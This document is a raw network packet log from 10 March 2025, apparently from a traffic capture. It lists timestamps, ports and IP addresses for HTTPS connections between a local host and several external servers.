Mar 10, 2025 13:56:19.374259949 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.374464035 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.374469995 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.380251884 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.380310059 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.380319118 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.380709887 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.380953074 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.380959034 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.387280941 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.387340069 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.387356043 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.387362003 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.387371063 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.387487888 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.387495995 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.388298988 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.393790007 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.393883944 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.393969059 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.394253016 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.394259930 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.394351959 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.400523901 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.400561094 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.400577068 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.400585890 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.400686979 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.407295942 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.414155006 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.414200068 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.414374113 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.414382935 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.414618969 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.421000004 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.427604914 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.427670002 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.427679062 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.456523895 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.456804037 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.456821918 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.457928896 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.457941055 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.457988024 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.458929062 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.459001064 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.459099054 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.465996027 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.466011047 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.466031075 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.466064930 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.466082096 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.466108084 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.466196060 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.469877958 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.470071077 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.470174074 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.470381021 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.470396042 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.470418930 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.470439911 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.470561028 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.470573902 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.470598936 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.470818996 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.471021891 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.471039057 CET | 443 | 49708 | 151.101.194.137 | 192.168.2.6 |
Mar 10, 2025 13:56:19.471055031 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.472244024 CET | 49707 | 443 | 192.168.2.6 | 104.17.25.14 |
Mar 10, 2025 13:56:19.472264051 CET | 443 | 49707 | 104.17.25.14 | 192.168.2.6 |
Mar 10, 2025 13:56:19.473459959 CET | 49708 | 443 | 192.168.2.6 | 151.101.194.137 |
Mar 10, 2025 13:56:19.504327059 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.507230997 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.507265091 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.545284986 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.545578003 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.545627117 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.546724081 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.546737909 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.546827078 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.547233105 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.547297001 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.547390938 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.556135893 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.588323116 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.594885111 CET | 443 | 49702 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.594965935 CET | 443 | 49702 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.595102072 CET | 49702 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.595535994 CET | 49702 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.595555067 CET | 443 | 49702 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.599783897 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:19.599796057 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:19.603677988 CET | 443 | 49703 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.603739023 CET | 443 | 49703 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.603806019 CET | 49703 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.603831053 CET | 443 | 49703 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.603880882 CET | 49703 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.603890896 CET | 443 | 49703 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.604001999 CET | 49703 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.604321957 CET | 49703 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.604336977 CET | 443 | 49703 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.610286951 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.610322952 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.610436916 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.610461950 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.610486984 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.610836983 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.610848904 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.610886097 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.611170053 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.611183882 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.618391991 CET | 443 | 49704 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.618454933 CET | 443 | 49704 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.618474960 CET | 443 | 49704 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.618494034 CET | 443 | 49704 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.618668079 CET | 443 | 49704 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.618755102 CET | 49704 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.618984938 CET | 49704 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.618999958 CET | 443 | 49704 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.623399973 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.623433113 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.623548985 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.623862028 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:19.623876095 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:19.653913975 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.071392059 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.071427107 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.071523905 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.071774006 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.073421001 CET | 49705 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.073441982 CET | 443 | 49705 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.161000967 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.161027908 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.161109924 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.161111116 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.161164999 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.162769079 CET | 49706 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.162789106 CET | 443 | 49706 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.164690971 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.164745092 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.172024965 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.172370911 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:20.172430992 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:20.437258959 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.437282085 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.437372923 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.437391043 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.440016985 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.440031052 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.440234900 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.440239906 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.440486908 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.440491915 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.665682077 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:20.665752888 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:20.668159962 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:20.668169975 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:20.668325901 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:20.668330908 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:20.668479919 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:20.668484926 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:20.782140970 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.782588005 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.782609940 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.810983896 CET | 49678 | 443 | 192.168.2.6 | 20.42.65.91 |
Mar 10, 2025 13:56:20.887228966 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.901479959 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.901546001 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.901578903 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.925470114 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.925537109 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.925554991 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.954479933 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.954529047 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.954551935 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.954569101 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.954595089 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.954652071 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:20.954660892 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:20.954822063 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:21.000370026 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:56:21.032633066 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.032979012 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.033013105 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.055434942 CET | 49672 | 443 | 192.168.2.6 | 204.79.197.203 |
Mar 10, 2025 13:56:21.055450916 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:56:21.130517960 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.180449009 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.263777971 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.318732023 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.318762064 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.691906929 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.691988945 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.724869013 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.725178003 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.725217104 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.726993084 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.727210999 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.727247000 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.728249073 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.728334904 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.728683949 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.728748083 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.728840113 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.729212999 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.729281902 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.729598045 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.729705095 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.729783058 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.733792067 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.733969927 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.733998060 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.735074043 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.735140085 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.735455990 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.735533953 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.735575914 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.743072033 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.743124008 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.743273973 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.743294954 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.743683100 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.749800920 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.749821901 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.749876976 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.749892950 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.756480932 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.756532907 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.756572962 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.763295889 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.763365030 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.769953012 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.769998074 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.770015955 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.773303986 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.773345947 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.773386002 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.773399115 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.780323029 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.784081936 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.784136057 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.784147978 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.784174919 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.784225941 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.784234047 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.788486004 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.788497925 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:21.816870928 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.816907883 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.834108114 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:21.834121943 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.835262060 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.835329056 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.835360050 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.835515976 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.835531950 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.839705944 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.839756012 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.839765072 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.846446037 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.846466064 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.846497059 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.846524000 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.846591949 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.849874973 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.856518030 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.856579065 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.856590033 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.856642962 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.856702089 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.863346100 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.863404989 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.870209932 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.870271921 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.870286942 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.870417118 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.876960993 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.876992941 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.877053022 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.877077103 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.883699894 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.883753061 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.883768082 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
